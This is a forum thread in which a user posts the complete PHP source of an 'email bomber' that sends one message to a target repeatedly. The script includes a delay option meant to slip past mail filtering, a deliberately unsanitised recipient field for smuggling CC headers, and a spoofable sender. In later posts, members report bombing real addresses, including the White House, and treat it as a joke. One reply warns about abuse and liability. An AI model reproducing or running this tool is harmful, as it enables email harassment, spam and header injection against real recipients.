Results 1 to 19 of 19

Thread: PHP Email Bomber by Ron

  1. #1
    Join Date
    Apr 2006
    Location
    I live in NH
    Posts
    611
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    PHP Email Bomber by Ron

    PHP Email Bomber by Ron

    Features
    + Able to put in name, to, from, subject, times, and a message.
    + The message can be in HTML.
    + And of course you can send the email more than once automatically.
    + A wait option so you can send emails every 5 seconds if you anted to avoid getting the email denied.


    Test: http://ron.pwnds.info/spazemail.php
    If you like this script, please visit www.goons.co.nr (my website) and click on an advertisement. Thank you!

    Code:
    <?
    /*
    Script Name: PHP Email Bomber originally by samatronic.com and by Ron
    Script Author: Ron
    Script Version: v.02
    
    If you like this script, please visit www.goons.co.nr (my website) and click on an advertisement.
    Thank you! ~Ron :)
    */
    ?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
    <head>
    <title>PHP Emailer originally by samatronic.com and fixed by Ron</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    </head>
    <body>
    
    <?php
    $name = stripslashes(htmlspecialchars($_POST['name']));
    $to = htmlspecialchars($_POST['to']); // purposely does not stripslashes so you can put in blah@blah.com\nCC:blah2@blah.com
    $from = stripslashes(htmlspecialchars($_POST['from']));
    $subject = stripslashes(htmlspecialchars($_POST['subject']));
    $count = $_POST['count'];
    $sleep = $_POST['sleep'];
    $message = stripslashes(nl2br($_POST['message'])); // doesn't use htmlspecialchars on purpose in order to send messages w/ html
    
    if (isset($_POST['submit'])) // if submit button is pressed...
    {
      if (empty($count) || $count == 0 || !is_numeric($count))
        $count = 1;
      if (empty($sleep) || !is_numeric($sleep))
        $sleep = 0;
      $headers = "From: $name <$from>\nReply-To: $from\nContent-Type:text/html"; // shows name, from, and makes the email able to use html
      echo "<p>Sending $count email(s) to: " . str_replace("\n", " ", $to) . "<br />\nThe wait is $sleep seconds in between each email.</p>\n\n";
      $count++; // increment $count because we are starting $i at 1
      for ($i = 1; $i < $count; $i++)
      {
        if (mail($to, $subject, $message, $headers))
          $check = "<span style=\"color: #00FF00;\">Sent</span>";
        else
          $check = "<span style=\"color: #FF0000;\">Not Sent.</span>";
        echo "Email $i: " . $check . " <br />\n";
        if ($i < $count - 1 && $sleep != 0)
          sleep($sleep);
      }
      echo "\n<br /><a href=\"$_SERVER[PHP_SELF]\">Would you like to send some more emails?</a>\n";
    }
      else
    {
    ?>
    
    <div align="center">
    <p style="font-size: 25px;">PHP Emailer originally by samatronic.com and fixed by Ron</p>
    <form action="<?=$_SERVER['PHP_SELF'];?>" method="post">
      <table width="600">
        <tr>
          <td>Name:</td>
          <td><input type="text" name="name" id="name" value="<?=$name;?>" /></td>
        </tr>
        <tr>
          <td>To:</td>
          <td><input type="text" name="to" id="to" value="<?=$to;?>" /></td>
        </tr>
        <tr>
          <td>From:</td>
          <td><input type="text" name="from" id="from" value="<?=$from;?>" /></td>
        </tr>
        <tr>
          <td>Subject:</td>
          <td><input type="text" name="subject" id="subject" value="<?=$subject;?>" /></td>
        </tr>
        <tr>
          <td>Times:</td>
          <td><input type="text" name="count" id="count" value="<?=$count;?>" /></td>
        </tr>
        <tr>
          <td>Wait Time (in seconds):</td>
          <td><input type="text" name="sleep" id="sleep" value="<?=$sleep;?>" /></td>
        </tr>
        <tr>
          <td valign="top">Message:</td>
          <td><textarea cols="50" rows="5" name="message" id="message"><?=$message;?></textarea></td>
        </tr>
        <tr>
          <td colspan="2" align="center"><input type="submit" name="submit" id="submit" value="Send Emails" /></td>
        </tr>
      </table>
    </form>
    </div>
    
    <?
    }
    ?>
    
    <p style="font-weight: bold; text-align: center;">Did you like this script? Please visit <a href="http://www.goons.co.nr" target="_blank">www.GOONS.co.nr</a> (my website)<br />
    and please click on an advertisement! Thank you! ~Ron :)</p>
    </body>
    </html>
    ~Ron

  2. #2
    Join Date
    Sep 2006
    Location
    New Jersey, USA
    Posts
    5,347
    Mentioned
    1 Post(s)
    Quoted
    3 Post(s)

    Default

    Nice, but possibly malicious?
    Interested in C# and Electrical Engineering? This might interest you.

  3. #3
    Join Date
    Apr 2006
    Location
    I live in NH
    Posts
    611
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    Since when was an email bomber benign?

  4. #4
    Join Date
    Nov 2006
    Location
    NSW, Australia
    Posts
    3,487
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    This is lovely
    [CENTER][img]http://signatures.mylivesignature.com/54486/113/4539C8FAAF3EAB109A3CC1811EF0941B.png[/img][/CENTER]
    [CENTER][BANANA]TSN ~ Vacation! ~ says :I Love Santy[/BANANA][/CENTER]

    [CENTER][BANANA]Raymond - Oh rilie? says :Your smart[/BANANA][/CENTER]

  5. #5
    Join Date
    Dec 2006
    Location
    Sweden
    Posts
    10,812
    Mentioned
    3 Post(s)
    Quoted
    16 Post(s)

    Default

    Nice!

    Hey Ron, whats your email address

    Sending 5 email(s) to: hy71194@gmail.com
    The wait is 5 seconds in between each email.
    Email 1: Sent
    Email 2: Sent
    Email 3: Sent
    Email 4: Sent
    Email 5: Sent

    Would you like to send some more emails? (YES!)


    Send SMS messages using Simba
    Please do not send me a PM asking for help; I will not be able to help you! Post in a relevant thread or make your own! And always remember to search first!

  6. #6
    Join Date
    Dec 2006
    Location
    Sweden
    Posts
    10,812
    Mentioned
    3 Post(s)
    Quoted
    16 Post(s)

    Default

    Woot srry for double post/bump, but look what I just did

    Code:
    Sending 50 email(s) to: President@whitehouse.gov
    The wait is 5 seconds in between each email.
    Email 1: Sent
    Email 2: Sent
    Email 3: Sent
    Email 4: Sent
    Email 5: Sent
    Email 6: Sent
    Email 7: Sent
    Email 8: Sent
    Email 9: Sent
    Email 10: Sent
    Email 11: Sent
    Email 12: Sent
    Email 13: Sent
    Email 14: Sent
    Email 15: Sent
    Email 16: Sent
    Email 17: Sent
    Email 18: Sent
    Email 19: Sent
    Email 20: Sent
    Email 21: Sent
    Email 22: Sent
    Email 23: Sent
    Email 24: Sent
    Email 25: Sent
    Email 26: Sent
    Email 27: Sent
    Email 28: Sent
    Email 29: Sent
    Email 30: Sent
    Email 31: Sent
    Email 32: Sent
    Email 33: Sent
    Email 34: Sent
    Email 35: Sent
    Email 36: Sent
    Email 37: Sent
    Email 38: Sent
    Email 39: Sent
    Email 40: Sent
    Email 41: Sent
    Email 42: Sent
    Email 43: Sent
    Email 44: Sent
    Email 45: Sent
    Email 46: Sent
    Email 47: Sent
    Email 48: Sent
    Email 49: Sent
    Email 50: Sent
    
    Would you like to send some more emails? [Take a guess ;) ]
    LOL!!! Oops, better more to Mexico now!


    Send SMS messages using Simba
    Please do not send me a PM asking for help; I will not be able to help you! Post in a relevant thread or make your own! And always remember to search first!

  7. #7
    Join Date
    Jun 2006
    Posts
    3,861
    Mentioned
    3 Post(s)
    Quoted
    0 Post(s)

    Default

    Quote Originally Posted by hy71194 View Post

    LOL!!! Oops, better more to Mexico now!
    Wow that's definitely the opposite of normal...

  8. #8
    Join Date
    Dec 2006
    Location
    Sweden
    Posts
    10,812
    Mentioned
    3 Post(s)
    Quoted
    16 Post(s)

    Default

    Well, If you just send 50+ emails to George Busy, wouldn't you wanna run away before his "hit men" get you?


    Send SMS messages using Simba
    Please do not send me a PM asking for help; I will not be able to help you! Post in a relevant thread or make your own! And always remember to search first!

  9. #9
    Join Date
    Jun 2007
    Posts
    124
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    lol nice, im sure he'll enjoy lookin at those

    roflmao!!!!

  10. #10
    Join Date
    Jul 2007
    Location
    Riding the escalator to heaven.
    Posts
    506
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Interesting...Im uh gonna use this k.
    Thanks ron






  11. #11
    Join Date
    Dec 2006
    Location
    .̿̂̔͋͗̎̆ͥ̍̒ͤ͂̾̌̀̅
    Posts
    3,012
    Mentioned
    1 Post(s)
    Quoted
    3 Post(s)

    Default

    This is nice I'll try this.

  12. #12
    Join Date
    Aug 2006
    Location
    Belgium
    Posts
    149
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Quote Originally Posted by hy71194 View Post
    Well, If you just send 50+ emails to George Busy, wouldn't you wanna run away before his "hit men" get you?
    Wouldnt Pwnd or Ron need to run, they host the site lol
    o/

  13. #13
    Join Date
    Nov 2006
    Location
    California, USA
    Posts
    336
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Ron I seriously suggest you only host the code. When someone receives the mass emails they can check the additional headers and trace the IP to your site. You will be liable if people get harassment emails and the like.

  14. #14
    Join Date
    Mar 2006
    Posts
    13,241
    Mentioned
    228 Post(s)
    Quoted
    267 Post(s)

    Default

    Code:
    Sending 20 email(s) to: **********
    The wait is 2 seconds in between each email.
    
    Email 1: Sent 
    Email 2: Sent 
    Email 3: Sent 
    Email 4: Sent 
    Email 5: Sent 
    Email 6: Sent 
    Email 7: Sent 
    Email 8: Sent 
    Email 9: Sent 
    Email 10: Sent 
    Email 11: Sent 
    Email 12: Sent 
    Email 13: Sent 
    Email 14: Sent 
    Email 15: Sent 
    Email 16: Sent 
    Email 17: Sent 
    Email 18: Sent 
    Email 19: Sent 
    Email 20: Sent 
    
    Would you like to send some more emails?
    Very nice
    STOP PM'ING ME

  15. #15
    Join Date
    Nov 2006
    Location
    California, USA
    Posts
    336
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    I only say this because when I hosted a PHP Bomber I made and let people know it started to get abused. I took it down after I read the logs I had it make.

  16. #16
    Join Date
    Apr 2006
    Location
    I live in NH
    Posts
    611
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    Don't worry about it. It's Pwnd's servers lol.

  17. #17
    Join Date
    Jul 2013
    Posts
    1
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Thumbs up Hi error running the script

    Your script seems to be running fine in PHP 5.1 but seems to have a problem in PHP 5.3 can you please rewrite the script for 5.3 since I am not a geek in PHP
    Neil

  18. #18
    Join Date
    May 2007
    Location
    England
    Posts
    4,140
    Mentioned
    11 Post(s)
    Quoted
    266 Post(s)

    Default

    That's one hell of a gravedig...Nearly 6 years.
    <3

    Quote Originally Posted by Eminem
    I don't care if you're black, white, straight, bisexual, gay, lesbian, short, tall, fat, skinny, rich or poor. If you're nice to me, I'll be nice to you. Simple as that.

  19. #19
    Join Date
    Mar 2007
    Posts
    5,125
    Mentioned
    275 Post(s)
    Quoted
    901 Post(s)

    Default

    Closed.

    Forum account issues? Please send me a PM

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Email @msn
    By Dangerous Garden Tools in forum News and General
    Replies: 2
    Last Post: 08-29-2007, 05:54 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •